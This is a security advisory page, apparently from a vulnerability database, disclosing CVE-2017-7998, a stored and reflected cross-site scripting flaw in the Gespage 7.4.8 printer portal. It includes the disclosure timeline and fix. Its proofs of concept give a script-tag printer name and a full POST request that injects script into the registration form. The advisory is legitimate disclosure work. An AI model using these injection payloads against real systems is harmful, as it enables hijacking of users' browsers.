Lucene search
K

Gespage 7.4.8 Cross Site Scripting Vulnerability

🗓️ 07 Jan 2018 00:00:00Reported by Mickael KaratekinType 
zdt
 zdt
🔗 0day.today👁 26 Views

Gespage 7.4.8 Cross Site Scripting Vulnerability in printer portal

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Gespage Cross-Site Scripting Vulnerability
8 Jan 201800:00
cnvd
CVE
CVE-2017-7998
8 Jan 201819:00
cve
Cvelist
CVE-2017-7998
8 Jan 201819:00
cvelist
EUVD
EUVD-2017-16968
7 Oct 202500:30
euvd
NVD
CVE-2017-7998
8 Jan 201819:29
nvd
OSV
CVE-2017-7998
8 Jan 201819:29
osv
Packet Storm
Gespage 7.4.8 Cross Site Scripting
6 Jan 201800:00
packetstorm
Prion
Cross site scripting
8 Jan 201819:29
prion
# [CVE-2017-7998] Gespage stored cross-site-scripting (XSS) vulnerability

## Description

Gespage is web solution providing a printer portal. Official Website:
http://www.gespage.com/

The web application does not properly filter several parameters sent by
users, allowing XSS code injection.
These vulnerabilities allow attackers to inject code inside the client
web browser, such as malicious scripts in Javascript. Exploitation leads
to a full takeover of the web browser and potentially of the operating
system.

**CVE ID**: CVE-2017-7998

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-79

**CVSS Base Score**:7.3

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

### Proof of Concept 1 (stored XSS)

From the admin panel, it is possible to add a printer with a crafted name:

```
"><script>alert("printer xss")</script>
```

If an authenticated user loads the "My Jobs"
("https://URL:7181/gespage/users/prnow.jsp") page, his browser processes
the Javascript payload, triggering the "printer xss" pop-up message.

### Proof of Concept 2 (reflected XSS)

From the registration page, it is possible to inject malicious web code
inside all parameters. The POST request looks like the following:

```
POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: IP:7180
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:51.0)
Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://IP:7180/gespage/webapp/users/user_reg.jsp
Cookie: JSESSIONID=YOUR_COOKIE_HERE
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 129

New_User=New&username=test"><script>alert(1)</script>&email=test%40test.fr&passwd=testtest&repasswd=testtest&fullname=test&accept_term=accept&OK=Enregistrer
```

## Timeline (dd/mm/yyyy)

* 06/03/2017 : Initial discovery
* 13/03/2017 : First contact attempt (Web form)
* 21/04/2017 : Second contact attempt (public e-mail address)
* 23/06/2017 : Phone call and successful e-mail contact
* 23/06/2017 : Technical details sent to the editor
* 20/07/2017 : No reply, follow-up e-mail
* 27/07/2017 : Reply: fix planned for major release 7.5.0 in late September
* 17/09/2017 : Informing the editor that we would publish in October
* 3/10/2017 : Feedback from Gespage informing us that the issue has been
fixed with version 7.4.9.
* 02/01/2018 : Release of the advisory

## Fixes

Upgrade to Gespage 7.4.9

## Affected versions

* Versions up to 7.4.9

## Credits

* Mickael KARATEKIN

#  0day.today [2018-01-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation